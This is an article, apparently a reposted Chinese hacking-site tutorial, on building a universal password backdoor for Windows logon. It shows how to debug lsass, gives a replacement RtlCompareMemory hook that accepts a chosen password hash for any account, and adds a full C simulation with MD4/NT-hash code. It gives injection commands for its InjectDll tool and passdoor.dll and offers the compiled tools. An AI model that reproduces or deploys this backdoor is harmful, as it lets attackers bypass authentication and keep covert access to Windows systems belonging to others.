Using an IAT hook to build a universal Windows password backdoor

ID MYHACK58:62200819145
Type myhack58
Reporter: Anonymous (佚名)
Modified 2008-05-25T00:00:00


Author: clyfish

Does Windows have a universal password? Go ask Uncle Bill.

Whether or not one really exists, we can build such a backdoor ourselves.

A brief outline of the Windows logon process. The winlogon process collects the user name and password through the GINA DLL and passes them over LPC to the lsass process. lsass then calls the default authentication package, msv1_0.dll, to check whether the password is right or wrong, and msv1_0 in turn fetches the user's account information, including the password hash, from the SAM.

To build the backdoor we first need the lowest-level function in this chain of authentication calls, and then do something clever to it. Clearly that lowest-level function lives in the msv1_0.dll module inside the lsass process.

The function lsass calls in msv1_0.dll is:


msv1_0!LsaApLogonUserEx2

(LsaApLogonUserEx2 on MSDN)

So we should debug the lsass process and set a breakpoint on msv1_0!LsaApLogonUserEx2. I used windbg and VMware, with dbgsrv for remote user-mode debugging. Spat's blog post "Debugging LSA via dbgsrv.exe" describes how to debug with dbgsrv. On the debuggee (the virtual machine) run:


dbgsrv.exe -t tcp:port=1234,password=spat

Then on the debugger side run (the debuggee's address goes after server=):


windbg.exe -premote tcp:server=,port=1234,password=spat

and attach to the lsass process. There is a catch: once dbgsrv is running under our session we cannot log off and log on again to trigger the code we want to see, because logging off kills dbgsrv with the session. So I used the Windows Task Scheduler to start dbgsrv at boot instead.

When the virtual machine starts, dbgsrv comes up with it; connect with windbg and attach to the lsass process. Set the breakpoint on msv1_0!LsaApLogonUserEx2 (bp msv1_0!LsaApLogonUserEx2) and let lsass continue. Then log on, and sure enough windbg breaks in.

Now for a powerful windbg command: wt (Trace and Watch Data). It records the entire tree of calls made from the current function until that function returns; see the windbg help for the exact usage. I believe wt works by single-stepping, so it is very slow. Its output is also very long and hard to read, so I wrote a Python script to load the wt output into a TreeCtrl.

The function under the mouse pointer in that tree view is ntdll!RtlCompareMemory. After some more debugging I found that this is the "bottom function" I was looking for.


SIZE_T RtlCompareMemory(IN CONST VOID *Source1, IN CONST VOID *Source2, IN SIZE_T Length);

(RtlCompareMemory on MSDN.) I also worked out what the three arguments are at the moment the password is verified: Source1 is the MD4 hash of the Unicode form of the user's password taken from the SAM (the NT hash), Source2 is the MD4 hash of the Unicode form of the password the user just typed, and Length is always 16, because an MD4 hash is 16 bytes. So I wrote this replacement function:


typedef SIZE_T (NTAPI *RtlCompareMemory_t)(const VOID *, const VOID *, SIZE_T);

RtlCompareMemory_t pRtlCompareMemory;   /* address of the real ntdll!RtlCompareMemory */
unsigned char PASSWD_HASH[16];          /* NT hash of the universal password */

SIZE_T NTAPI MyRtlCompareMemory(const VOID *a, const VOID *b, SIZE_T len)
{
    /* A 16-byte compare whose second buffer equals our hash: report a full
       match without looking at the first buffer (the hash from the SAM). */
    if (len == 16 && pRtlCompareMemory(PASSWD_HASH, b, len) == 16)
        return 16;
    return pRtlCompareMemory(a, b, len);   /* everything else: the real behaviour */
}

Here pRtlCompareMemory is a global variable holding the address of the real RtlCompareMemory, and PASSWD_HASH is the hash of the universal password. Hooking RtlCompareMemory with MyRtlCompareMemory gives exactly the behaviour we want: if the requested compare is 16 bytes long and the second buffer is identical to our hash, report a full match, no matter what the first buffer contains. Note that this relies on the argument order observed above (SAM hash first, typed hash second). Someone may ask: this hooks every call msv1_0 makes to RtlCompareMemory, won't that break something? Rest assured; how often will a call happen to compare exactly 16 bytes whose second buffer is identical to our hash?
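To make the above concrete, here is an added example (my own code, not the article's passdoor.dll) that shows what PASSWD_HASH has to contain and how the hooked compare decides. It is portable C: ntdll!RtlCompareMemory is replaced by a stand-in with the same contract (it returns the number of leading bytes that match), and the NT hash is computed with an inline MD4 over the UTF-16LE password, so the same code shows that the universal password, the account's real password, and a wrong password are all handled as the article claims. It assumes the argument order the article observed (Source1 = hash from the SAM, Source2 = hash of the typed password, Length = 16) and ASCII-only passwords; the names logon_with_universal, real_RtlCompareMemory and nt_hash are mine.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MD4_ROTL(x, n) (((x) << (n)) | ((x) >> (32 - (n))))
#define MD4_F(x, y, z) (((x) & (y)) | (~(x) & (z)))
#define MD4_G(x, y, z) (((x) & (y)) | ((x) & (z)) | ((y) & (z)))
#define MD4_H(x, y, z) ((x) ^ (y) ^ (z))

/* One 64-byte MD4 block (RFC 1320): three rounds of 16 steps each. */
static void md4_block(uint32_t st[4], const uint8_t blk[64])
{
    static const int k2[16] = {0,4,8,12,1,5,9,13,2,6,10,14,3,7,11,15};
    static const int k3[16] = {0,8,4,12,2,10,6,14,1,9,5,13,3,11,7,15};
    static const int s1[4] = {3,7,11,19}, s2[4] = {3,5,9,13}, s3[4] = {3,9,11,15};
    uint32_t X[16], t, a = st[0], b = st[1], c = st[2], d = st[3];
    int i;
    for (i = 0; i < 16; i++)                      /* message words, little-endian */
        X[i] = (uint32_t)blk[4*i] | (uint32_t)blk[4*i+1] << 8 |
               (uint32_t)blk[4*i+2] << 16 | (uint32_t)blk[4*i+3] << 24;
    for (i = 0; i < 16; i++) { t = MD4_ROTL(a + MD4_F(b,c,d) + X[i], s1[i%4]);
                               a = d; d = c; c = b; b = t; }
    for (i = 0; i < 16; i++) { t = MD4_ROTL(a + MD4_G(b,c,d) + X[k2[i]] + 0x5A827999u, s2[i%4]);
                               a = d; d = c; c = b; b = t; }
    for (i = 0; i < 16; i++) { t = MD4_ROTL(a + MD4_H(b,c,d) + X[k3[i]] + 0x6ED9EBA1u, s3[i%4]);
                               a = d; d = c; c = b; b = t; }
    st[0] += a; st[1] += b; st[2] += c; st[3] += d;
}

static void md4(const uint8_t *msg, size_t len, uint8_t out[16])
{
    uint32_t st[4] = {0x67452301u, 0xefcdab89u, 0x98badcfeu, 0x10325476u};
    uint8_t blk[64];
    uint64_t bits = (uint64_t)len * 8;
    size_t i, rem;
    for (i = 0; i + 64 <= len; i += 64) md4_block(st, msg + i);
    rem = len - i;
    memset(blk, 0, sizeof blk);
    memcpy(blk, msg + i, rem);
    blk[rem] = 0x80;                              /* pad: 1 bit, zeros, 64-bit length */
    if (rem >= 56) { md4_block(st, blk); memset(blk, 0, sizeof blk); }
    for (i = 0; i < 8; i++) blk[56 + i] = (uint8_t)(bits >> (8 * i));
    md4_block(st, blk);
    for (i = 0; i < 16; i++) out[i] = (uint8_t)(st[i / 4] >> (8 * (i % 4)));
}

/* NT hash = MD4(UTF-16LE(password)); for ASCII each char becomes ch, 0x00. */
static void nt_hash(const char *password, uint8_t out[16])
{
    uint8_t u16[256];                             /* up to 128 characters */
    size_t n = strlen(password), i;
    if (n > 128) n = 128;
    for (i = 0; i < n; i++) { u16[2*i] = (uint8_t)password[i]; u16[2*i+1] = 0; }
    md4(u16, 2 * n, out);
}

static int nt_hash_is(const char *password, const char *hex32)
{
    uint8_t h[16]; char buf[33]; int i;
    nt_hash(password, h);
    for (i = 0; i < 16; i++) sprintf(buf + 2*i, "%02x", h[i]);
    return strcmp(buf, hex32) == 0;
}

/* Stand-in for ntdll!RtlCompareMemory: number of leading bytes that match. */
static size_t real_RtlCompareMemory(const void *s1, const void *s2, size_t len)
{
    const uint8_t *a = s1, *b = s2; size_t i = 0;
    while (i < len && a[i] == b[i]) i++;
    return i;
}

static uint8_t PASSWD_HASH[16];                   /* NT hash of the universal password */

/* Same decision rule as the article's MyRtlCompareMemory. */
static size_t MyRtlCompareMemory(const void *a, const void *b, size_t len)
{
    if (len == 16 && real_RtlCompareMemory(PASSWD_HASH, b, len) == 16)
        return 16;                                /* typed hash == universal hash */
    return real_RtlCompareMemory(a, b, len);      /* anything else: the real result */
}

/* Models msv1_0's check with the hook in place: set the universal password, put the
 * account's real password in the "SAM", then attempt a logon with the typed one. */
static int logon_with_universal(const char *universal, const char *real_pw, const char *typed)
{
    uint8_t sam[16], attempt[16];
    nt_hash(universal, PASSWD_HASH);
    nt_hash(real_pw, sam);
    nt_hash(typed, attempt);
    return MyRtlCompareMemory(sam, attempt, 16) == 16;
}

int main(void)
{
    printf("known vector NT(\"password\"): %s\n",
           nt_hash_is("password", "8846f7eaee8fb117ad06bdd830b7586c") ? "ok" : "BAD");
    printf("real password %d, universal %d, wrong %d\n",
           logon_with_universal("letmein", "correct horse", "correct horse"),
           logon_with_universal("letmein", "correct horse", "letmein"),
           logon_with_universal("letmein", "correct horse", "wrong"));
    return 0;
}
```

The point a practitioner should take from this: PASSWD_HASH is not the password, it is the 16-byte NT hash (MD4 of the UTF-16LE password), so whatever is patched into the DLL must be computed that way; a wrong password still fails because the hook only short-circuits when the second buffer equals the universal hash; and compares of any other length fall straight through to the real function, which is why hooking every call from msv1_0 is harmless in practice.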

There are many ways to hook this function; I chose the laziest one, an IAT hook plus DLL injection. So I wrote a small tool to inject a DLL, InjectDll:


C:\Documents and Settings\cly\desktop\bin>InjectDll.exe
InjectDll v0.1
Inject/UnInject a dll file to a process, by cly, at 20080522
Usage: InjectDll.exe (-i | -u | -U) pid filename
  -i: Inject
  -u: UnInject once
  -U: UnInject at all

passdoor.dll is the DLL that gets injected into the lsass process; its DllMain installs the IAT hook. That is a very old technique, so I have not posted the code; a web search turns up plenty of examples.

I also wrote a small tool, pdconfig, which simply rewrites the hash stored inside passdoor.dll, so that changing the universal password does not require recompiling passdoor.dll.

Method of use:


InjectDll.exe -i pid_of_lsass full_path_of_passdoor.dll

To remove it:


InjectDll.exe -U pid_of_lsass full_path_of_passdoor.dll

Here are the source code and compiled binaries of the tools from this article, including InjectDll.exe, passdoor.dll and pdconfig.exe. All of the code was compiled with MinGW gcc 4.2.1.